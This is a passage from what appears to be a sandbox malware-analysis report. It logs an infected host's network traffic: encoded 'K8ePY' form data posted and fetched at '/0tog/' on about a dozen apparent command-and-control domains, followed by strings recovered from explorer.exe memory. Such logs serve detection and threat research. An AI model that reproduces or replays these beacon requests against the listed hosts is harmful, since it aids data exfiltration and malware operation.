2d 63 6d 6d 30 6a 37 7a 72 35 76 7e 39 6d 4f 36 4b 6a 69 39 37 4d 77 4e 49 64 72 65 51 35 64 66 41 59 74 50 67 63 4c 57 61 7e 66 43 6d 4b 77 65 63 28 31 62 6f 6f 68 56 5a 66 47 6b 51 70 71 64 52 55 57 30 58 64 4c 51 39 54 36 66 57 51 55 55 77 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: K8ePY=WyNoShgjoiwUJD61kUy_9t7gbwUN76tbEkqxpM~Sh2Ggj4gfUNDIrHwdgqfLq-1bJ0h6VvPQYD8HB2oQARtXgHCJTquhq5zONBYTvPu5tOXTl5e53DXbeX0QyOUINnj9(SsLpY5VtgmJyOQupjlZe7nGI7cAaUj_(MIuADNmnGOlNadwlUn6~z(-8FgeaxruRrJoH9eoGDaUou8drksBQOKllP02K5noxreJsjoPdBhuG_oP0BiFKxM1t6~PEl5D5PSD9RuUVlQ35WnKt-1WtXeoXYkz9GyD4-ASCaD_55yvBl7ytY9G~-ZONvaPNtwtG-cmm0j7zr5v~9mO6Kji97MwNIdreQ5dfAYtPgcLWa~fCmKwec(1boohVZfGkQpqdRUW0XdLQ9T6fWQUUw).
Source: global traffic | HTTP traffic detected:
  POST /0tog/ HTTP/1.1
  Host: www.splishysplashie.com
  Connection: close
  Content-Length: 411
  Cache-Control: no-cache
  Origin: http://www.splishysplashie.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.splishysplashie.com/0tog/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 4b 38 65 50 59 3d 58 55 70 30 38 52 58 57 41 73 49 51 4c 4d 65 6b 49 41 70 69 46 49 55 43 77 6d 6c 52 57 35 76 74 78 57 5a 4c 52 43 58 37 77 68 41 32 74 67 4e 49 4b 70 4e 6f 4b 43 48 6f 56 4d 55 62 56 43 32 33 28 59 71 75 73 68 37 6d 45 4e 7e 4f 41 50 48 4e 45 43 68 34 52 75 79 53 44 54 4e 54 36 78 79 33 38 54 59 74 61 5a 53 44 52 66 44 68 32 78 54 52 66 55 57 64 64 4a 66 36 5a 55 34 6e 65 70 59 69 52 69 42 79 39 59 28 39 77 6a 28 73 77 58 4d 6d 5a 2d 62 63 32 64 6c 4f 42 6a 79 36 74 44 6e 42 54 77 39 6e 78 67 48 54 37 71 57 4f 48 59 30 5f 59 6f 7e 35 6e 37 6c 72 51 6f 50 43 67 62 33 46 67 53 69 63 32 35 4c 75 44 41 74 51 34 6d 36 59 36 63 6a 47 73 73 6a 4c 71 5a 72 7a 7a 67 31 58 4a 53 61 7a 78 4f 69 55 34 37 44 4c 5a 6f 66 64 6a 79 58 38 42 41 75 6d 71 43 43 78 6e 43 68 43 68 42 67 68 5a 68 45 65 36 58 33 74 43 35 52 50 74 45 43 37 54 62 51 79 6c 7a 73 37 70 54 7e 66 55 46 38 31 77 6d 74 52 28 43 70 69 73 2d 35 77 74 41 4d 32 45 77 6b 70 6f 4c 34 2d 49 53 34 55 43 39 79 56 58 6c 31 77 79 49 6c 5a 41 43 70 50 54 35 4b 47 47 62 79 55 74 46 79 31 4c 4b 6f 78 68 69 46 51 4c 58 57 4f 4f 46 4c 6b 47 53 71 63 64 5a 70 46 48 5a 36 4a 4d 4c 7e 6a 36 69 33 66 66 5f 48 68 43 78 34 71 5a 4b 6a 58 34 41 5a 62 43 41 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: K8ePY=XUp08RXWAsIQLMekIApiFIUCwmlRW5vtxWZLRCX7whA2tgNIKpNoKCHoVMUbVC23(Yqush7mEN~OAPHNECh4RuySDTNT6xy38TYtaZSDRfDh2xTRfUWddJf6ZU4nepYiRiBy9Y(9wj(swXMmZ-bc2dlOBjy6tDnBTw9nxgHT7qWOHY0_Yo~5n7lrQoPCgb3FgSic25LuDAtQ4m6Y6cjGssjLqZrzzg1XJSazxOiU47DLZofdjyX8BAumqCCxnChChBghZhEe6X3tC5RPtEC7TbQylzs7pT~fUF81wmtR(Cpis-5wtAM2EwkpoL4-IS4UC9yVXl1wyIlZACpPT5KGGbyUtFy1LKoxhiFQLXWOOFLkGSqcdZpFHZ6JML~j6i3ff_HhCx4qZKjX4AZbCA).
Source: global traffic | HTTP traffic detected:
  POST /0tog/ HTTP/1.1
  Host: www.ugpounds.info
  Connection: close
  Content-Length: 411
  Cache-Control: no-cache
  Origin: http://www.ugpounds.info
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.ugpounds.info/0tog/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 4b 38 65 50 59 3d 6a 78 59 68 5a 6e 34 33 31 72 6e 70 52 2d 42 49 39 56 34 44 57 35 64 51 6c 4e 4a 65 35 38 6c 34 6d 67 7e 64 33 77 4d 41 70 49 61 76 72 35 61 45 79 57 4c 30 6a 43 30 4e 49 45 56 72 6e 77 56 75 79 65 34 35 6e 6d 66 33 43 74 62 54 45 75 62 68 77 59 53 46 33 7a 52 37 6e 78 50 69 31 52 68 54 30 69 66 6c 48 45 4a 79 51 6b 46 32 38 77 4d 6c 77 53 4d 74 31 41 41 77 32 74 76 37 42 72 36 71 68 50 44 70 51 2d 45 35 38 52 32 4c 74 31 7e 7a 54 33 65 66 44 42 78 65 4f 43 63 30 72 5f 78 30 59 47 7e 51 6a 33 72 76 79 4c 48 39 55 33 66 50 6e 5f 59 6f 65 48 7a 4e 77 31 39 35 50 38 51 45 6c 65 69 6d 77 6d 49 51 6a 58 46 57 30 5a 44 44 4c 4d 6f 78 67 38 34 61 28 57 7a 39 7a 66 46 6b 67 4c 66 2d 41 64 37 56 74 43 6d 39 6a 5f 72 7a 4c 35 6f 6d 79 49 76 36 65 47 39 55 54 50 66 58 70 4d 4d 59 35 59 45 56 51 76 7a 4a 4c 39 64 50 6c 57 73 4f 28 74 6e 54 36 46 63 32 30 51 69 4f 28 5a 34 70 6a 5a 68 67 62 46 37 5a 6f 55 47 32 4a 78 52 39 56 6f 43 74 69 39 4b 53 42 6a 65 38 4d 67 4b 46 53 4d 65 78 42 37 42 67 4f 54 71 61 48 73 30 4b 4e 35 4b 43 65 4e 41 64 46 65 31 59 55 6c 6a 33 4d 73 56 31 73 6a 30 38 4a 4b 61 2d 4f 2d 31 54 65 74 38 6f 44 4b 78 49 70 2d 68 6f 51 4d 39 75 30 45 45 78 4d 4f 28 38 56 69 63 75 6a 41 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: K8ePY=jxYhZn431rnpR-BI9V4DW5dQlNJe58l4mg~d3wMApIavr5aEyWL0jC0NIEVrnwVuye45nmf3CtbTEubhwYSF3zR7nxPi1RhT0iflHEJyQkF28wMlwSMt1AAw2tv7Br6qhPDpQ-E58R2Lt1~zT3efDBxeOCc0r_x0YG~Qj3rvyLH9U3fPn_YoeHzNw195P8QEleimwmIQjXFW0ZDDLMoxg84a(Wz9zfFkgLf-Ad7VtCm9j_rzL5omyIv6eG9UTPfXpMMY5YEVQvzJL9dPlWsO(tnT6Fc20QiO(Z4pjZhgbF7ZoUG2JxR9VoCti9KSBje8MgKFSMexB7BgOTqaHs0KN5KCeNAdFe1YUlj3MsV1sj08JKa-O-1Tet8oDKxIp-hoQM9u0EExMO(8VicujA).
Source: global traffic | HTTP traffic detected:
  POST /0tog/ HTTP/1.1
  Host: www.kuralike.com
  Connection: close
  Content-Length: 411
  Cache-Control: no-cache
  Origin: http://www.kuralike.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.kuralike.com/0tog/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 4b 38 65 50 59 3d 71 48 4e 53 63 6a 73 38 57 66 4a 50 66 68 5a 52 76 33 66 75 61 56 52 48 44 43 39 59 58 79 46 46 28 73 4d 45 6b 66 79 70 58 44 31 61 55 47 34 58 6e 6e 56 50 65 4a 28 73 42 31 75 76 49 33 37 4b 71 49 75 54 54 2d 54 32 7e 79 49 48 34 62 39 47 54 66 4c 49 5a 69 6d 4d 44 34 41 50 43 31 4a 4b 6f 38 69 76 61 33 48 59 59 4d 61 4d 4f 57 7a 38 4d 58 6a 34 33 54 50 49 72 43 7e 72 69 69 53 63 39 71 55 77 77 68 4c 52 59 34 74 32 67 37 44 49 34 4f 48 66 52 65 35 47 43 32 64 61 76 73 63 6e 61 5f 42 7a 75 6b 30 56 6b 6a 70 37 52 62 7e 69 37 2d 6e 55 38 69 33 73 34 4d 30 32 54 4c 6c 30 43 70 30 65 59 73 71 71 56 67 4d 70 63 44 4a 66 6c 4e 7a 51 31 7a 6b 34 6b 79 37 48 38 47 33 69 34 54 70 73 36 76 4a 30 64 43 66 56 69 74 7e 65 76 68 64 7a 64 52 73 43 31 53 67 70 68 6f 30 70 44 78 4c 55 43 44 4e 4f 39 37 59 6a 71 56 6e 46 4f 66 45 45 53 70 74 49 62 5a 37 56 39 69 38 78 58 77 58 70 4d 34 31 5a 72 49 35 6a 6e 54 79 71 38 6b 7a 5a 48 74 77 46 4e 66 39 5a 49 43 78 63 4b 63 71 6e 73 46 63 71 6a 41 57 2d 33 73 53 6c 72 4e 65 49 6f 35 54 58 70 55 37 57 79 70 28 35 4c 61 28 42 43 55 53 70 64 6d 6e 44 51 72 70 5f 7a 69 69 5a 44 73 64 75 46 39 6a 61 76 43 36 70 78 59 44 44 77 30 59 7a 5a 63 54 49 28 78 46 31 4e 77 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: K8ePY=qHNScjs8WfJPfhZRv3fuaVRHDC9YXyFF(sMEkfypXD1aUG4XnnVPeJ(sB1uvI37KqIuTT-T2~yIH4b9GTfLIZimMD4APC1JKo8iva3HYYMaMOWz8MXj43TPIrC~riiSc9qUwwhLRY4t2g7DI4OHfRe5GC2davscna_Bzuk0Vkjp7Rb~i7-nU8i3s4M02TLl0Cp0eYsqqVgMpcDJflNzQ1zk4ky7H8G3i4Tps6vJ0dCfVit~evhdzdRsC1Sgpho0pDxLUCDNO97YjqVnFOfEESptIbZ7V9i8xXwXpM41ZrI5jnTyq8kzZHtwFNf9ZICxcKcqnsFcqjAW-3sSlrNeIo5TXpU7Wyp(5La(BCUSpdmnDQrp_ziiZDsduF9javC6pxYDDw0YzZcTI(xF1Nw).
Source: global traffic | HTTP traffic detected:
  POST /0tog/ HTTP/1.1
  Host: www.cdershoushichang.com
  Connection: close
  Content-Length: 411
  Cache-Control: no-cache
  Origin: http://www.cdershoushichang.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.cdershoushichang.com/0tog/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 4b 38 65 50 59 3d 37 7a 75 38 35 2d 54 49 63 49 32 61 63 49 47 32 37 33 37 31 55 74 44 46 63 46 36 79 76 65 5a 5a 61 36 4f 5f 42 61 46 4b 43 30 4c 31 34 45 4e 4e 6d 55 50 72 6e 72 28 62 42 52 7a 71 52 50 38 49 7e 34 63 66 66 6e 54 33 52 55 65 71 69 4c 42 6d 58 46 39 55 44 41 50 4d 36 68 51 63 33 76 39 43 6f 6e 51 31 5a 66 4d 49 6b 6d 6a 64 36 77 30 42 56 58 78 79 4f 38 4b 5f 65 71 4d 55 28 42 44 73 67 78 75 6e 5a 33 36 55 50 37 69 39 76 45 70 66 46 76 6c 6d 6a 54 7a 48 6b 7a 70 46 39 6b 45 77 57 43 48 36 48 58 62 66 69 31 32 78 76 49 59 74 38 4a 78 52 44 54 75 37 54 78 69 45 48 55 6e 58 34 4d 32 43 79 4a 50 62 7e 72 62 37 39 30 39 35 74 4a 52 7a 34 31 64 46 4f 62 28 71 42 71 75 66 32 6d 53 49 34 51 79 72 79 65 31 47 28 35 33 6a 65 68 49 7a 35 63 47 44 36 37 6c 67 38 37 38 62 64 6a 55 4d 42 5f 35 36 69 74 66 35 37 35 47 66 67 64 57 69 6f 5f 7e 48 69 31 67 35 59 34 78 58 67 62 72 4f 54 35 33 6d 71 36 77 46 56 79 54 58 70 31 30 39 42 41 4c 7a 43 44 65 55 57 49 79 38 54 36 48 53 41 2d 48 4a 74 79 6a 79 35 45 51 6f 62 46 4c 67 31 4b 56 6e 78 41 63 72 32 51 39 51 4a 49 47 6c 76 57 78 4d 72 54 73 73 35 71 56 37 69 65 57 4b 34 4b 73 35 6d 78 4e 57 70 30 78 65 35 6c 77 41 56 58 74 6d 4c 73 6e 4d 48 6b 6a 5f 71 77 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: K8ePY=7zu85-TIcI2acIG27371UtDFcF6yveZZa6O_BaFKC0L14ENNmUPrnr(bBRzqRP8I~4cffnT3RUeqiLBmXF9UDAPM6hQc3v9ConQ1ZfMIkmjd6w0BVXxyO8K_eqMU(BDsgxunZ36UP7i9vEpfFvlmjTzHkzpF9kEwWCH6HXbfi12xvIYt8JxRDTu7TxiEHUnX4M2CyJPb~rb79095tJRz41dFOb(qBquf2mSI4Qyrye1G(53jehIz5cGD67lg878bdjUMB_56itf575GfgdWio_~Hi1g5Y4xXgbrOT53mq6wFVyTXp109BALzCDeUWIy8T6HSA-HJtyjy5EQobFLg1KVnxAcr2Q9QJIGlvWxMrTss5qV7ieWK4Ks5mxNWp0xe5lwAVXtmLsnMHkj_qw).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cakoi.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cakoi.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cakoi.xyz/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 4a 48 4a 55 79 77 32 39 35 36 6c 5a 70 67 4a 54 71 5a 6b 4f 54 5f 70 43 73 62 4f 75 7e 76 61 30 71 64 42 62 28 7a 55 44 47 36 6d 65 69 57 31 5f 38 5a 41 78 39 74 64 62 4e 34 6e 6b 6d 68 6d 4a 44 4b 58 37 66 50 37 78 70 68 52 69 41 57 52 36 65 56 74 32 33 37 42 67 69 34 76 66 54 37 7a 47 4c 74 6f 74 73 4e 54 52 7e 6d 4f 55 4e 63 73 4f 68 4c 78 53 35 59 36 70 28 74 4d 53 33 63 66 2d 4a 52 44 59 58 68 68 74 71 4a 54 48 4a 6d 48 6e 6b 6d 6a 4f 37 41 7e 69 75 64 71 79 67 6a 28 78 47 6d 7e 30 46 46 41 61 71 48 51 4b 74 4b 38 36 61 4d 55 75 62 33 56 37 44 44 64 62 43 61 44 55 79 41 63 6c 38 2d 58 6d 36 7a 53 46 68 79 62 44 50 41 48 6b 41 52 45 6a 78 59 4d 4d 55 61 61 32 6d 49 5a 67 4b 79 4e 78 65 6c 36 43 6f 66 42 31 4d 48 57 63 70 5a 30 4c 50 51 75 4d 39 51 52 78 43 57 32 52 50 75 43 62 33 62 7a 66 56 56 62 64 54 39 6b 32 7a 73 6a 59 54 7a 39 43 5a 41 46 62 41 6f 53 41 71 6a 5a 59 6c 66 52 50 45 6d 75 76 4f 4e 44 34 6d 7a 37 71 68 5f 4c 43 33 62 66 6a 7a 6b 75 50 59 74 6f 34 73 52 53 7a 79 5a 4c 42 63 32 49 33 77 36 57 2d 57 5f 4b 5f 6e 78 53 36 6a 30 6a 70 4a 44 4e 44 54 74 4d 39 57 34 42 7a 6d 6a 72 43 57 77 43 37 69 47 59 49 77 5a 49 34 54 42 50 5f 72 51 50 69 72 31 44 5a 64 75 6e 73 79 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=JHJUyw2956lZpgJTqZkOT_pCsbOu~va0qdBb(zUDG6meiW1_8ZAx9tdbN4nkmhmJDKX7fP7xphRiAWR6eVt237Bgi4vfT7zGLtotsNTR~mOUNcsOhLxS5Y6p(tMS3cf-JRDYXhhtqJTHJmHnkmjO7A~iudqygj(xGm~0FFAaqHQKtK86aMUub3V7DDdbCaDUyAcl8-Xm6zSFhybDPAHkAREjxYMMUaa2mIZgKyNxel6CofB1MHWcpZ0LPQuM9QRxCW2RPuCb3bzfVVbdT9k2zsjYTz9CZAFbAoSAqjZYlfRPEmuvOND4mz7qh_LC3bfjzkuPYto4sRSzyZLBc2I3w6W-W_K_nxS6j0jpJDNDTtM9W4BzmjrCWwC7iGYIwZI4TBP_rQPir1DZdunsyQ).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.davabeauty.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.davabeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.davabeauty.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 6f 64 6a 79 4d 6d 76 72 6f 6c 48 71 30 71 53 54 4a 63 75 37 58 39 62 38 6d 45 6c 72 72 73 58 48 48 44 69 35 76 50 61 33 33 38 6d 61 5a 4f 79 68 58 38 32 4f 6e 51 6e 5a 62 66 4b 71 59 38 4e 76 57 38 69 61 41 7a 79 70 33 5a 4f 44 76 57 47 47 66 5a 62 33 7e 58 47 41 52 64 69 59 56 76 39 36 58 4f 42 31 69 68 67 67 65 38 68 6a 35 4c 37 4d 32 6d 43 49 32 74 45 51 64 4b 4f 70 6e 7a 4f 34 69 44 79 49 4a 52 64 52 47 51 4a 5a 7a 6d 68 72 65 33 50 4a 46 53 46 41 6f 35 58 65 6d 50 62 4b 6a 32 36 5f 69 73 50 4c 6a 6a 63 6c 78 7a 6c 36 52 37 77 4f 4e 6a 79 31 47 78 50 67 76 62 69 77 44 50 61 47 41 4b 34 43 61 5f 47 55 37 75 42 41 41 36 7e 6e 41 76 69 48 6e 47 33 49 6b 33 4d 71 7a 77 62 6b 77 44 6d 39 37 54 33 39 34 50 28 47 48 70 52 42 78 70 56 71 71 73 73 34 55 4c 57 32 42 57 64 52 44 62 53 2d 76 7a 33 6d 63 6d 56 46 38 61 61 67 78 31 58 69 4a 54 42 5a 72 78 31 6e 75 7a 6b 5f 64 68 4f 4e 35 6b 6b 2d 51 46 57 76 73 2d 36 43 59 45 6b 58 71 47 54 66 64 4a 42 6e 67 63 70 6a 37 46 4e 5f 67 70 4e 67 5a 6b 61 49 4d 70 37 56 34 5a 72 48 30 4b 41 64 78 63 51 2d 42 58 41 77 6d 5a 51 6e 59 6e 75 35 5a 55 49 75 28 42 32 59 33 74 48 65 52 72 66 77 58 32 4b 61 32 31 28 76 6d 33 72 51 66 70 30 6d 72 34 61 6c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=odjyMmvrolHq0qSTJcu7X9b8mElrrsXHHDi5vPa338maZOyhX82OnQnZbfKqY8NvW8iaAzyp3ZODvWGGfZb3~XGARdiYVv96XOB1ihgge8hj5L7M2mCI2tEQdKOpnzO4iDyIJRdRGQJZzmhre3PJFSFAo5XemPbKj26_isPLjjclxzl6R7wONjy1GxPgvbiwDPaGAK4Ca_GU7uBAA6~nAviHnG3Ik3MqzwbkwDm97T394P(GHpRBxpVqqss4ULW2BWdRDbS-vz3mcmVF8aagx1XiJTBZrx1nuzk_dhON5kk-QFWvs-6CYEkXqGTfdJBngcpj7FN_gpNgZkaIMp7V4ZrH0KAdxcQ-BXAwmZQnYnu5ZUIu(B2Y3tHeRrfwX2Ka21(vm3rQfp0mr4alDQ).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.icfc-lr.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.icfc-lr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.icfc-lr.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 74 77 7e 38 57 64 4b 48 5a 4c 38 45 73 31 6e 34 6a 74 6a 4a 38 35 4c 35 70 72 37 63 7e 50 38 59 7a 35 65 54 72 41 70 72 62 59 6c 48 68 61 50 39 4c 56 42 51 30 4b 78 75 74 59 79 54 4d 2d 42 35 4c 7a 63 75 68 34 62 31 69 31 45 64 4d 6f 70 6e 69 2d 68 59 65 36 57 76 6d 72 5a 70 71 38 45 56 42 42 53 6f 6f 41 51 64 7e 53 6a 43 4d 47 63 52 57 50 52 53 6f 48 63 49 4d 2d 39 76 54 31 41 58 4e 45 43 7a 47 5f 33 4f 6d 36 4b 5f 45 36 74 6e 42 66 31 6e 67 76 61 75 69 63 6d 46 7a 72 72 65 41 70 78 31 69 74 6a 63 78 44 31 74 7e 6f 58 66 65 61 6d 4b 6f 5f 4c 4b 64 55 45 5a 6d 43 73 6f 79 57 45 34 66 4e 46 5f 63 68 28 35 59 44 48 61 50 58 4c 75 32 7a 68 38 76 37 63 34 59 2d 61 64 45 58 4b 6f 57 67 45 56 4d 33 4f 4c 6b 69 67 42 79 4d 5a 52 53 52 6f 74 6b 42 34 55 6d 41 43 64 51 2d 55 61 73 77 69 34 7a 62 36 6d 77 44 46 38 6e 54 6b 70 77 37 71 43 56 79 48 51 39 63 52 30 28 50 41 31 6e 79 6b 76 64 53 6a 5f 41 45 69 79 79 74 52 64 4b 59 41 65 44 46 48 4b 54 66 51 6d 4d 53 42 5f 62 55 72 76 76 50 43 33 79 35 46 74 41 6d 57 76 36 5f 54 78 37 7a 65 70 76 6c 68 61 61 30 4a 4e 6f 30 36 2d 79 62 31 68 50 48 75 43 48 49 79 56 73 77 65 62 32 5a 4d 48 79 77 78 73 67 64 34 63 33 6a 37 31 41 61 62 5a 45 49 5a 54 75 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=tw~8WdKHZL8Es1n4jtjJ85L5pr7c~P8Yz5eTrAprbYlHhaP9LVBQ0KxutYyTM-B5Lzcuh4b1i1EdMopni-hYe6WvmrZpq8EVBBSooAQd~SjCMGcRWPRSoHcIM-9vT1AXNECzG_3Om6K_E6tnBf1ngvauicmFzrreApx1itjcxD1t~oXfeamKo_LKdUEZmCsoyWE4fNF_ch(5YDHaPXLu2zh8v7c4Y-adEXKoWgEVM3OLkigByMZRSRotkB4UmACdQ-Uaswi4zb6mwDF8nTkpw7qCVyHQ9cR0(PA1nykvdSj_AEiyytRdKYAeDFHKTfQmMSB_bUrvvPC3y5FtAmWv6_Tx7zepvlhaa0JNo06-yb1hPHuCHIyVsweb2ZMHywxsgd4c3j71AabZEIZTuA).
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1 | Host: www.smileyefero.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1 | Host: www.cxyl968.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1 | Host: www.bestselfietools.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1 | Host: www.homecaredispatch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1 | Host: www.netrworksoultions.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1 | Host: www.splishysplashie.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1 | Host: www.ugpounds.info | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1 | Host: www.kuralike.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1 | Host: www.cdershoushichang.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1 | Host: www.cakoi.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1 | Host: www.davabeauty.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1 | Host: www.icfc-lr.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: unknown | DNS traffic detected: queries for: www.smileyefero.com
          Source: unknown | HTTP traffic detected: POST /0tog/ HTTP/1.1 | Host: www.cxyl968.com | Connection: close | Content-Length: 411 | Cache-Control: no-cache | Origin: http://www.cxyl968.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.cxyl968.com/0tog/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/8.5 | X-Frame-Options: SAMEORIGIN | Date: Wed, 16 Sep 2020 07:14:45 GMT | Connection: close | Content-Length: 1163
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
